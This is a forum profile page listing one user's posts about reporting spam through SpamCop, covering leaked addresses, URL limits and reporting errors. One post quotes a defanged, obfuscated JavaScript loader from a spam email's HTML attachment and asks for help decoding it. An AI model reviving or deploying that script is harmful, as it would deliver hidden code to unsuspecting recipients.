MisterBill

Members
  • Content count

    20
  • Joined

  • Last visited

Community Reputation

0 Neutral

About MisterBill

  • Rank
    Member

Recent Profile Visitors

251 profile views
  1. Sorry, here's the link: https://www.spamcop.net/sc?id=z6372706844z03952f3bb4595463ae09c956c7b4d131z I don't want it to be deleted automatically before I can view the messages but in normal cases where SC decides it is unable to send any reports, it takes it out of the queue. In this case, it just seems like it aborts processing rather than deciding that it cannot send reports. And this isn't the first time I've run into this.
  2. I tried to report spam, and apparently it's not reportable. However, the email doesn't get cleared from the queue, and when I go back to the site, it tells me "Unreported spam Saved: Report Now". It seems like Spamcop should be deleting this from my queue when it realizes that it can't send any reports. I should not have to remove it myself. Here is the end of the processing screen that I get. Suggestions? Bill Tracking link: http://www.fedex.com/?location=home No recent reports, no history available ISP does not wish to receive report regarding www.fedex.com Host www.fedex.com (checking ip) = 23.72.27.113 Resolves to 23.72.27.113 Routing details for 23.72.27.113 [refresh/show] Cached whois for 23.72.27.113 : ip-admin@akamai.com Using abuse net on ip-admin@akamai.com abuse net akamai.com = abuse@akamai.com Using best contacts abuse@akamai.com abuse@akamai.com redirects to abuse-spamcop@akamai.com ISP does not wish to receive reports regarding http://www.fedex.com/?location=home - no date available http://www.fedex.com/?location=home has been appealed previously. Tracking link: http://www.fedex..com/us/legal/ No recent reports, no history available Host www.fedex..com (checking ip)
  3. I have my own domain, and I use different email addresses at different sites (like starbucks[at]mydomain.us) so I can tell where my address came from if/when their mailing list gets stolen (I use wildcard forwarding so I don't need to define each address). It turns out that this happens a lot more often than you'd think and I've been getting emails at addresses used at only a single site for a while now. They seem to come in batches, typically it's some of the nasty stuff with attachments and thanks to Spamcop I've determined that it comes from different sites, so I'm guessing it's being sent by zombie machines. Interestingly, I rarely get this spam at addresses that I've never used, so this says to me that something is getting these addresses and I'd like to know how. I've always figured that it was various sites that got hacked. My email addresses from sites like Consumerist, Couponmom and Opentable that routinely get spam. Some of those that have been compromised for a while I've set up dummy forwarding for (to a non-existent address) so I don't get those anymore. I got a really huge batch of this spam today (it's been bad for the past week), and included in it was one sent to a "citi" address, which I've used for Citibank and nothing else (and this is the first time I've seen spam sent to it). So this means that either their database has been hacked, or else the spammers are getting my addresses from some other source. My mail is forwarded thru Namecheap's forwarding service to my Verizon mailbox. It seems like they'd be getting it from one of those sources, or from my machine, and I think that the latter is pretty unlikely. Fortunately all of this stuff ends up in my Verizon spam folder, but I would love to figure out how this is happening. Any ideas?
  4. I'm also seeing this problem, and it's occurring with email sent by Mailwasher and the piece of mail being tossed likely had multiple pieces of spam in it, all of which are presumably lost. Are you still interested in receiving a copy of the email to investigate? Sadly, I don't think it contains what was sent, which would be useful.
  5. This is still a problem. I got this spam reporting rejected today. Can someone tell me what the ipv6 header is? They look OK to me. http://www.spamcop.net/sc?id=z5246558407z8...;action=display
  6. Thanks for the link. I agree that reporting email addresses in the header is useless. But that page says that reporting the address where the spammer is expecting replies can be useful. yet it does not do it. I prefer to have something like Spamcop doing the reporting because it is anonymous. If I have to send it with my real email address and find out that the spammer also owns the domain I am reporting him to (i.e., he is getting the complaint), I will likely get much more spam as a result.
  7. I've recently started getting a lot of spam from a hosting company. There is no website to report but there is a mailto that they have responses going to. However, Spamcop is not sending any notice to that site. Is there a reason? Seems like an address that gets replies is going to be real, so definitely the site owner should be notified. http://www.spamcop.net/sc?id=z4996578016z3...7ff1799c84ceeaz
  8. Not to belabor the point, but the net result was the same. Changing the URL's so that enough of them were alike or deleting a bunch, both reduced the count of URL's to allow Spamcop to report on a number it considers acceptable. In both cases it changed the behavior of Spamcop because it would not have reported any URL's otherwise.
  9. Thanks. But once again, it appears that deleting lines is just as bad as changing URL's. So I don't understand why that was suggested as an acceptable solution.
  10. I had not thought of deleting lines, but how is doing that any different than changing the URL to be the same domain as others already in the email? Either way, the mail has been doctored. It's not like I am adding new domains to be reported, so the result is the same as deleting the lines.
  11. Well, given that the emails seemed to come from different locations, I assume they were being sent by zombie machines, which made the mail origin not very useful, either.
  12. Sorry, I did not want to post the URL because I thought that it would have my actual email address in the source, but I see that it's x'ed out. This is not the link for the email that I posted above, but it is a similar one (turns out they were using several different domains, I discovered this when processing the rest of the spam I had received). http://www.spamcop.net/sc?id=z4993364257z6...9710e86d3c2b5fz And the issue is not that some of the domain names are not valid and cannot be resolved -- it's that Spamcop doesn't even try because there are more than 25 in the email, so it stops processing any of them. It seems like a really simple way for a spammer to avoid getting their domains reported. Just overload Spamcop with a bunch of different hosts, and none get reported.
  13. I've started getting Viagra spam at multiple addresses at my private domain which have clearly been stolen from other sites. Making things worse, the sleazy spammer is using multiple random first level names on their domain (example: http://lpijuxl.domcitystr.com), so Spamcop stops looking at URLs after the first 25 and does not report any of them! I tried playing with it and changed a bunch of the URLs to be the same and it was going to report to: spam[at]ccert.edu.cn anti-spam[at]mail.sxptt.zj.cn abuse#anti-spam.cn[at]devnull.spamcop.net What can be done to fix Spamcop so it can't get tricked by spammers like this and DOES report? Granted, reporting to this site is not likely to result in the spammer being stopped, but it would be nice to have it sent so it can be tracked. I wonder if the spammer is actually doing this to break Spamcop, or for another reason. Here is the spam with my domain and forwarding email at my ISP x'ed out: Admn Edit: entire spam posting removed. Things like this is why the use of a Tracking URL is requested.
  14. I got spam which had a java scri_pt portion to it. I can't figure out what it is trying to do, can someone help? The email claimed there was a PDF to view, I will attach the whole section for context. Content-type: text/html; name="61114Journal Sentinel - Leka Obit.html" Content-transfer-encoding: 7BIT Content-disposition: attachment; filename="61114Journal Sentinel - Leka Obit.html" <scri_pt language="java scri_pt" type="text/java scri_pt">function xfxs(oajm){var cz58="sr:0.cpt/ =\"xg;lhivm-quoefn>a<",iwy0,qyot,n3dt="",vvg8,wo2u=cz58.length;enum(unescape("%66un%63ti%6Fn l%6A2w%28fs%61a){%6E3d%74+=%66saa%7D"));for(qyot=0;qyot<oajm.length;qyot++){iwy0=oajm.charAt(qyot);vvg8=cz58.indexOf(iwy0);if(vvg8>-1){vvg8-=(qyot+1)%wo2u;if(vvg8<0){vvg8+=wo2u;}lj2w(cz58.charAt(vvg8));}else{lj2w(iwy0);}}enum(unescape("%64oc%75me%6Et.w%72it%65(n%33dt)%3Bn3%64t=%22%22;"));}xfxs("sq>\"0lolhhrp.p:.><-;hoie\"tp0un/n<\"li=ur\"nu<quumn>>loieo alefv m=q<;rgl.rqnm:et.rss-");</scri_pt><noscript>To display this page you need a browser that supports java scri_pt.</noscript> --Boundary_(ID_pbZ6Ms2kvXLizaqNrjbRog)--
  15. Looks fixed to me. Thanks.